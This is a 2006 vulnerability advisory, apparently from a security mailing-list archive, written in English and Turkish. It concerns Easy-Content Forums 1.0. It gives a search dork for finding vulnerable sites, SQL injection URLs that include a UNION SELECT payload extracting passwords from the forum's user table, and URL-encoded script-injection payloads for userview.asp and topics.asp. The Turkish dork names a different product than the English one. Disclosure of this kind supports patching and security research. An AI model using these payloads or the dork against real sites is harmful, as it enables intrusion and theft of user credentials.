Easy-Content Forums 1.0 Multiple [SQL/XSS] Vulnerabilities May 23 2006 06:39PM
ajannhwt hotmail com
ENGLISH

# Title : Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities

# Dork : "Copyright 2004 easy-content forums"

# Author : ajann

# Exploit;

SQL INJECTİON--------------------------------------------------------

### http://[target]/[path]/userview.asp?startletter=SQL TEXT

### http://[target]/[path]/topics.asp?catid=1'SQL TEXT =>catid=x

Example:

http://[target]/[path]/topics.asp?catid=1 union+select+0,password,0,0,0,0,0,0,0,0+from+tbl_forum_users

XSS--------------------------------------------------------

### http://[target]/[path]/userview.asp?startletter=xss TEXT

### http://[target]/[path]/topics.asp?catid=30&forumname=XSS TEXT

Example:

http://[target]/[path]/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ea
lert%28%27X%27%29%3B%3C%2Fscript%3E

%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E == X

# ajann,Turkey

TURKISH

# Başlık : Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities

# Sözcük[Arama] : "powered by phpmydirectory"

# Açığı Bulan : ajann

# Açık bulunan dosyalar;

SQL INJECTİON--------------------------------------------------------

### http://[target]/[path]/userview.asp?startletter=SQL SORGUNUZ

### http://[target]/[path]/topics.asp?catid=1'SQL SORGUNUZ =>catid=Değişken

Örnek:

http://[target]/[path]/topics.asp?catid=1 union+select+0,password,0,0,0,0,0,0,0,0+from+tbl_forum_users

XSS--------------------------------------------------------

### http://[target]/[path]/userview.asp?startletter=XSS KODLARINIZ

### http://[target]/[path]/topics.asp?catid=30&forumname=XSS KODLARINIZ

Örnek:

http://[target]/[path]/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ea
lert%28%27X%27%29%3B%3C%2Fscript%3E

%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E Ekrana X uyarısı çıkarıcaktır.

Açıklama:

userview.asp , topics.asp dosyalarında bulunan filtreleme eksikliği nedeniyle sql sorgu çalıştırılabilmektedir.

userview.asp , topics.asp dosyalarında bulunan filtreleme eksikliği nedeniyle xss kodları çalışabilmektedir.

# ajann,Turkiye

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus